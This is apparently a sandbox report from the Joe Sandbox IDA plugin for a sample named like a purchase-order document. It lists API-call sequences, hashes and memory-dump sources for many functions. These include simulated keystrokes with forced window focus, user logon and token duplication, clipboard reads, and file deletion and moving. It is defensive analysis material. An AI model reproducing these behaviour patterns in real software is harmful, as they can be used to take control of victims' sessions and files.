                                                                                    • Opcode Fuzzy Hash: db1701c0be686a09c34a812f32fab54525693b4439208972ee6eba40ac6b7c56
                                                                                    • Instruction Fuzzy Hash: 2F428D74205241AFDB24CF24CC48EAABBE5FF49310F154A1AF699973A1DB31E864CF91
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001D48F3
                                                                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 001D4908
                                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 001D4927
                                                                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 001D494B
                                                                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 001D495C
                                                                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 001D497B
                                                                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001D49AE
                                                                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001D49D4
                                                                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 001D4A0F
                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001D4A56
                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001D4A7E
                                                                                    • IsMenu.USER32(?), ref: 001D4A97
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001D4AF2
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001D4B20
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 001D4B94
                                                                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 001D4BE3
                                                                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 001D4C82
                                                                                    • wsprintfW.USER32 ref: 001D4CAE
                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001D4CC9
                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 001D4CF1
                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001D4D13
                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001D4D33
                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 001D4D5A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                    • String ID: %d/%02d/%02d
                                                                                    • API String ID: 4054740463-328681919
                                                                                    • Opcode ID: 476a2a4ed4fdce889aa302d25f79c3ed4a2373c32564770c626c5fdb2f97bdf6
                                                                                    • Instruction ID: 7fbb24637270aa10c47803bcb07031852d7f34274d0ea444a66e059ca0b2ffe4
                                                                                    • Opcode Fuzzy Hash: 476a2a4ed4fdce889aa302d25f79c3ed4a2373c32564770c626c5fdb2f97bdf6
                                                                                    • Instruction Fuzzy Hash: E112DD71601215ABEB248F68CC49FAE7BF8EF45710F10462AF916EB3E1DB749941CB90
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0015F998
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0019F474
                                                                                    • IsIconic.USER32(00000000), ref: 0019F47D
                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 0019F48A
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 0019F494
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0019F4AA
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0019F4B1
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0019F4BD
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0019F4CE
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0019F4D6
                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0019F4DE
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 0019F4E1
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019F4F6
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0019F501
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019F50B
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0019F510
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019F519
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0019F51E
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019F528
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0019F52D
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 0019F530
                                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0019F557
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 4125248594-2988720461
                                                                                    • Opcode ID: 34cef7181c4f1180d105340934ffff2537283f5302040cf1182b9201a29a70c4
                                                                                    • Instruction ID: bd06cc3e7933db354b363e710678f90685a46ac18a06e140c2a8409241de2487
                                                                                    • Opcode Fuzzy Hash: 34cef7181c4f1180d105340934ffff2537283f5302040cf1182b9201a29a70c4
                                                                                    • Instruction Fuzzy Hash: 58315E71B41219BAEF206BB55C4AFBF7F6CEB44B50F11046AFA00E61D1C7B09941EAA0
                                                                                    APIs
                                                                                      • Part of subcall function 001A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001A170D
                                                                                      • Part of subcall function 001A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001A173A
                                                                                      • Part of subcall function 001A16C3: GetLastError.KERNEL32 ref: 001A174A
                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 001A1286
                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001A12A8
                                                                                    • CloseHandle.KERNEL32(?), ref: 001A12B9
                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001A12D1
                                                                                    • GetProcessWindowStation.USER32 ref: 001A12EA
                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 001A12F4
                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001A1310
                                                                                      • Part of subcall function 001A10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001A11FC), ref: 001A10D4
                                                                                      • Part of subcall function 001A10BF: CloseHandle.KERNEL32(?,?,001A11FC), ref: 001A10E9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                    • String ID: $default$winsta0$Z
                                                                                    • API String ID: 22674027-3366205268
                                                                                    • Opcode ID: 6f4b9956698fc171bd59ddc0e1d2478d5253fb092498bdd070b8a3e91b7eb17d
                                                                                    • Instruction ID: c4fa168453d38354dfdf4c9fa5984e1e3d64aef37214109ed5a827202125bff7
                                                                                    • Opcode Fuzzy Hash: 6f4b9956698fc171bd59ddc0e1d2478d5253fb092498bdd070b8a3e91b7eb17d
                                                                                    • Instruction Fuzzy Hash: 0D819B7594120ABFDF219FA8DC49FEE7BB9EF09704F14452AF910A62A1C7308994CB60
                                                                                    APIs
                                                                                      • Part of subcall function 001A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001A1114
                                                                                      • Part of subcall function 001A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1120
                                                                                      • Part of subcall function 001A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A112F
                                                                                      • Part of subcall function 001A10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1136
                                                                                      • Part of subcall function 001A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001A114D
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001A0BCC
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001A0C00
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001A0C17
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 001A0C51
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001A0C6D
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001A0C84
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001A0C8C
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 001A0C93
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001A0CB4
                                                                                    • CopySid.ADVAPI32(00000000), ref: 001A0CBB
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001A0CEA
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001A0D0C
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001A0D1E
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0D45
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001A0D4C
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0D55
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001A0D5C
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0D65
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001A0D6C
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A0D78
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001A0D7F
                                                                                      • Part of subcall function 001A1193: GetProcessHeap.KERNEL32(00000008,001A0BB1,?,00000000,?,001A0BB1,?), ref: 001A11A1
                                                                                      • Part of subcall function 001A1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001A0BB1,?), ref: 001A11A8
                                                                                      • Part of subcall function 001A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001A0BB1,?), ref: 001A11B7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                    • String ID:
                                                                                    • API String ID: 4175595110-0
                                                                                    • Opcode ID: 982d1e5d97bd5f79d60d7f0e8fdbfec642382bc16a3a8d331b98f252f88a6c61
                                                                                    • Instruction ID: 575d18aab3b8a2c59edfeee611f77bc42fbc8e2e83b34864a54624a206542a3c
                                                                                    • Opcode Fuzzy Hash: 982d1e5d97bd5f79d60d7f0e8fdbfec642382bc16a3a8d331b98f252f88a6c61
                                                                                    • Instruction Fuzzy Hash: 1B717B7A90121AEBDF11DFE4DC44FAEBBB8BF09310F044615F914A7291D771AA45CBA0
                                                                                    APIs
                                                                                    • OpenClipboard.USER32(001DCC08), ref: 001BEB29
                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 001BEB37
                                                                                    • GetClipboardData.USER32(0000000D), ref: 001BEB43
                                                                                    • CloseClipboard.USER32 ref: 001BEB4F
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 001BEB87
                                                                                    • CloseClipboard.USER32 ref: 001BEB91
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 001BEBBC
                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 001BEBC9
                                                                                    • GetClipboardData.USER32(00000001), ref: 001BEBD1
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 001BEBE2
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 001BEC22
                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 001BEC38
                                                                                    • GetClipboardData.USER32(0000000F), ref: 001BEC44
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 001BEC55
                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 001BEC77
                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001BEC94
                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001BECD2
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 001BECF3
                                                                                    • CountClipboardFormats.USER32 ref: 001BED14
                                                                                    • CloseClipboard.USER32 ref: 001BED59
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                    • String ID:
                                                                                    • API String ID: 420908878-0
                                                                                    • Opcode ID: 9051d8630654b163ef58e1259a39ae3eeccd35ae787a30ae76094b4730c18988
                                                                                    • Instruction ID: 8fc718e0e73b273499e13ee450636fa88d3d793f49655b059b842ae38e2b3dc4
                                                                                    • Opcode Fuzzy Hash: 9051d8630654b163ef58e1259a39ae3eeccd35ae787a30ae76094b4730c18988
                                                                                    • Instruction Fuzzy Hash: 6561D2352053029FD300EF64D888FAA77E8EF94714F14491EF456972A2CB71DD85CBA2
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001B69BE
                                                                                    • FindClose.KERNEL32(00000000), ref: 001B6A12
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001B6A4E
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001B6A75
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 001B6AB2
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 001B6ADF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                    • API String ID: 3830820486-3289030164
                                                                                    • Opcode ID: 354bf5aa9d81db342a0373e38375aaea42cc0ef577e9f38a2c38c686aa40e211
                                                                                    • Instruction ID: b363b33c2f2a2b20c561079e730a94289c976e43239faa5dc57d539463a1f36a
                                                                                    • Opcode Fuzzy Hash: 354bf5aa9d81db342a0373e38375aaea42cc0ef577e9f38a2c38c686aa40e211
                                                                                    • Instruction Fuzzy Hash: 17D17271508300AFC714EBA4D891EAFB7ECAFA9704F44491DF585D71A1EB34DA48CBA2
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001B9663
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 001B96A1
                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 001B96BB
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 001B96D3
                                                                                    • FindClose.KERNEL32(00000000), ref: 001B96DE
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 001B96FA
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001B974A
                                                                                    • SetCurrentDirectoryW.KERNEL32(00206B7C), ref: 001B9768
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001B9772
                                                                                    • FindClose.KERNEL32(00000000), ref: 001B977F
                                                                                    • FindClose.KERNEL32(00000000), ref: 001B978F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1409584000-438819550
                                                                                    • Opcode ID: db18c2fa0c99ba2b717eb38ef472f5bfa9f3e0e29bacdefc11be97f87bef9ef0
                                                                                    • Instruction ID: 3ec6a01ba28fd3cbdde3f344a5ba05b88bd3e501bfccb4f00e216375309551cf
                                                                                    • Opcode Fuzzy Hash: db18c2fa0c99ba2b717eb38ef472f5bfa9f3e0e29bacdefc11be97f87bef9ef0
                                                                                    • Instruction Fuzzy Hash: 0F31E47254221A6EDF14EFB4DC48ADE77ECAF09320F104556FA05E21A1EB30DD91CE90
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001B97BE
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 001B9819
                                                                                    • FindClose.KERNEL32(00000000), ref: 001B9824
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 001B9840
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001B9890
                                                                                    • SetCurrentDirectoryW.KERNEL32(00206B7C), ref: 001B98AE
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001B98B8
                                                                                    • FindClose.KERNEL32(00000000), ref: 001B98C5
                                                                                    • FindClose.KERNEL32(00000000), ref: 001B98D5
                                                                                      • Part of subcall function 001ADAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001ADB00
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                    • String ID: *.*
                                                                                    • API String ID: 2640511053-438819550
                                                                                    • Opcode ID: a2660e9c33dd03fdf8231f50ddcd9de09f27a2006043955d1e2fadd560335eca
                                                                                    • Instruction ID: 5ebfb528ac21e9be1df646d224f41bb4f302c31639098593abb823f61c3b8380
                                                                                    • Opcode Fuzzy Hash: a2660e9c33dd03fdf8231f50ddcd9de09f27a2006043955d1e2fadd560335eca
                                                                                    • Instruction Fuzzy Hash: 0031127250121E6ADF10EFB4EC48ADE77BCAF06320F104556EA00E20E1DB30DA96CAA0
                                                                                    APIs
                                                                                    • GetLocalTime.KERNEL32(?), ref: 001B8257
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001B8267
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001B8273
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001B8310
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001B8324
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001B8356
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001B838C
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001B8395
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1464919966-438819550
                                                                                    • Opcode ID: fdd964d0929e29ca5514a5a0300a148153c204be66a397aeb15e12dc89bbc532
                                                                                    • Instruction ID: 9b49178c694891e401f93924861950f2c7bacafe958dfe418cd09dc738b7247b
                                                                                    • Opcode Fuzzy Hash: fdd964d0929e29ca5514a5a0300a148153c204be66a397aeb15e12dc89bbc532
                                                                                    • Instruction Fuzzy Hash: F26159725083459FCB10EF64D8809AEB3ECFF99714F04491AF999C7261DB31E945CB92
                                                                                    APIs
                                                                                      • Part of subcall function 00143AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00143A97,?,?,00142E7F,?,?,?,00000000), ref: 00143AC2
                                                                                      • Part of subcall function 001AE199: GetFileAttributesW.KERNEL32(?,001ACF95), ref: 001AE19A
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001AD122
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 001AD1DD
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001AD1F0
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 001AD20D
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001AD237
                                                                                      • Part of subcall function 001AD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,001AD21C,?,?), ref: 001AD2B2
                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 001AD253
                                                                                    • FindClose.KERNEL32(00000000), ref: 001AD264
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 1946585618-1173974218
                                                                                    • Opcode ID: abcce554ec9f594acaed3c9824c1bf8c2d3408c331a704975bd90c2da7053e17
                                                                                    • Instruction ID: e94fe19ac2b6f85d99f35bbadbaaacdeb927d10a88c753362bd079bab7d20636
                                                                                    • Opcode Fuzzy Hash: abcce554ec9f594acaed3c9824c1bf8c2d3408c331a704975bd90c2da7053e17
                                                                                    • Instruction Fuzzy Hash: 8961603580110D9FCF05EBE0E992AEDB7B5AF66304F604166E406771A2EB305F09DB60
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
